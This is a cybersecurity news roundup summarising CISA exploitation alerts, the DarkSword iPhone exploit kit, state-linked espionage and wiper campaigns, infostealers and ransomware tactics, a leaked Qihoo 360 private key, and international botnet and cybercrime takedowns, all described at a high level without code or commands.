The US Cybersecurity and Infrastructure Security Agency (CISA) has warned about active exploitation of a number of vulnerabilities in several software products. These include CVE-2025-66376 in Synacor Zimbra Collaboration Suite, which allows attackers to perform stored cross-site scripting using CSS in emails. The flaw was fixed in versions 10.0.18 and 10.1.13.
Another vulnerability is CVE-2026-20963 affecting Microsoft Office SharePoint. It lets attackers execute code remotely through deserialization of untrusted data and was fixed in January 2026.
The third flaw is CVE-2025-47813 affecting Wing FTP Server. The vulnerability allows a remote user to gain access to potentially sensitive information; it was addressed in version 7.4.4.
Amazon threat hunting team reported that the Interlock ransomware operation has been exploiting the CVE-2026-20131 vulnerability in Cisco Secure Firewall Management Center since January 2026. CISA has also flagged the flaw as actively exploited.
A novel exploit kit dubbed DarkSword is being used to compromise Apple iPhones and steal sensitive user data. The threat targets devices running iOS versions 18.4 through 18.7 and has been linked to multiple threat actors, including the suspected Russian group UNC6353 previously linked to the Coruna exploit chain. According to researchers, DarkSword leverages six known vulnerabilities (CVE-2025-31277, CVE-2025-43529, CVE-2026-20700, CVE-2025-14174, CVE-2025-43510, and CVE-2025-43520) to gain deep access to compromised devices.
A new Barracuda report examines Sandworm (akaAPT44), a Russian GRU-backed threat group known for its destructive malware attacks against Ukraine such as major attacks like the 2015 Ukraine power outages and the 2017 NotPetya incident. The group focuses on disruption and destruction rather than simple espionage. The threat actor was observed using data-wiping malware like Zerolot, Sting, Caddywiper, and DynoWiper to damage systems, target industrial control systems to cause power outages and deploying Infamous Chisel to infect Ukrainian military Android devices. Sandworm is also believed to be behind the Cyclops Blink botnet, which infects firewall devices. As of 2026, the group continues attacking Ukrainian energy and government sectors with new tools like BadPilot while expanding operations against Western energy, telecommunications, and government organizations.
Ukrainian organizations were targeted in a cyberespionage campaign in February 2026, likely linked to Russian threat actors. According to LAB52, the attack is similar to earlier operations by the group Laundry Bear aka UAC-0190 or Void Blizzard. The campaign used fake judicial and charity messages to spread the DRILLAPP JavaScript-based backdoor that runs in Microsoft Edge. Once installed, it can steal files, access the microphone, and capture webcam images.
In the meantime, Sequrite researchers have discovered a campaign the dubbed “Operation Ghostmail,” in which Russian state-backed hackers APT28 or Fancy Bear targeted Ukraine’s State Hydrographic Service involved in maritime navigation and critical infrastructure. The group launched a phishing campaign that exploits a Zimbra webmail vulnerability (CVE-2025-66376), which allows attackers to inject malicious code into emails viewed in the browser.
Also, Russia has increased its intelligence activities in the Austrian capital, turning Vienna into an important center for electronic and satellite spying. Officials have found many satellite antennas on top of Russian buildings, especially in the Donaustadt district and the city center. The antennas can be moved and adjusted to intercept different types of communications, including those used by international organizations.
ESET has released a lengthy report based on analysis of 90 EDR killer tools used by attackers to disable security systems (like Endpoint Detection and Response). Most EDR killer tools use legitimate vulnerable drivers to gain higher system privileges. According to a Slovak cybersecurity company, over half of the detected tools rely on the BYOVD (bring your own vulnerable driver) method.
The Genians Security Center (GSC) has uncovered a new wave of cyberattacks linked to the KONNI advanced persistent threat (APT) campaign, a hacking operation believed to be associated with North Korean groups commonly known as Kimsuky or APT37. According to GSC, attackers distributed malicious files disguised as “stress-relief programs” through South Korea’s popular KakaoTalk messaging platform. The files were designed to infect victims’ computers and enable long-term surveillance.
A suspected China-based cyber espionage campaign has targeted military organizations across Southeast Asia in a long-running operation that dates back to at least 2020. Researchers said the campaign, tracked as CL-STA-1087, focuses on carefully targeted intelligence gathering rather than large-scale data theft. The operation leverages backdoors called AppleChris and MemFun, as well as a credential-harvesting utility known as Getpass.
In the meantime, the European Council has imposed new sanctions against two Chinese companies, an Iranian firm and two individuals accused of carrying out cyberattacks targeting EU member states and international partners.
The cyberespionage group Boggy Serpen (aka MuddyWater) linked to Iran’s Ministry of Intelligence and Security (MOIS), is continuing to target critical sectors such as energy, maritime, finance, and diplomacy across the Middle East and other regions. The group is now using AI-assisted malware that includes anti-analysis features, helping it stay hidden in compromised systems for longer periods.
The US Department of Justice announced that it seized four websites linked to MOIS. The sites (Justicehomeland[.]org, Handala-Hack[.]to, Karmabelow80[.]org, and Handala-Redwanted[.]to) were used for hacking-related propaganda, sharing stolen data, and threatening journalists, dissidents, and others. One of the domains was also used to claim responsibility for a destructive cyberattack on US medical technology company Stryker in March 2026.
Gen Threat Labs analyses VoidStealer, an infostealer that uses an advanced technique to bypass Application-Bound Encryption (ABE). Instead of using common methods like code injection or gaining higher system privileges, it uses hardware breakpoints (a debugging feature) to directly extract the browser’s encryption key from memory.
A new Android malware called Perseus is being spread through fake TV streaming apps. It can steal passwords, banking information, and even access users’ personal notes. ThreatFabtic researchers say it mainly targets people in Turkey and Italy and is based on leaked code from older banking malware like Cerberus.
Symantec and Carbon Black researchers have spotted a new malware called Speagle that takes over the legitimate Cobra DocGuard software to steal sensitive data from infected computers. It sends the stolen information to a compromised Cobra DocGuard server, masking the data theft as legitimate communications between client and server.
The LeakNet ransomware group is now using the ClickFix techniques on hacked websites to gain access to victims. It also uses a new Deno-based loader that runs hidden code in memory, gathers system information, and connects to its command server.
Threat actors are abusing the legitimate open-source benchmarking script Bench.sh as part of post-exploitation workflows in real-world intrusions. Researchers say that attackers are now incorporating Bench.sh as a lightweight reconnaissance utility after gaining initial access.
Microsoft threat intelligence team has uncovered a cyber-espionage campaign attributed to a threat actor tracked as Storm-2561 that distributes fake enterprise VPN clients to harvest user credentials. Attackers are using SEO poisoning to manipulate search results for terms such as “Pulse VPN download” or “Pulse Secure client.” Victims who click the malicious links are redirected to spoofed websites that imitate legitimate VPN vendors including Ivanti, Cisco, and Fortinet.
A large-scale supply-chain attack linked to the GlassWorm campaign has been observed, compromising hundreds of software components across major developer platforms. Multiple security researchers report that over 400 packages, repositories, and extensions were affected in the latest wave.
One of China’s biggest Qihoo 360 accidentally included a highly sensitive wildcard SSL private key inside the public installer for its 360 Security Claw AI assistant. Because the file was unprotected, anyone who downloaded the software could easily extract the key using basic tools. This key allows authentication across the company’s myclaw.360.cn platform and all its subdomains.
The US authorities and law enforcement agencies from Canada and Germany shut down four major IoT botnets: Aisuru, KimWolf, JackSkid, and Mossad that infected millions of devices like cameras and routers and were used to launch massive DDoS attacks worldwide, some reaching record-breaking sizes. The attackers sold access to the infected devices to other criminals, who used them for cyberattacks and extortion.
An international law enforcement operation coordinated by INTERPOL has disrupted large-scale cybercrime networks worldwide, sinkholing tens of thousands of malicious IP addresses and seizing key digital infrastructure. The operation, codenamed ‘Operation Synergia III,’ ran from July 2025 to January 2026 and involved authorities from 72 countries. Law enforcement officers seized 212 electronic devices and servers linked to cybercriminal activity and arrested 94 suspects. Another 110 individuals are currently under investigation.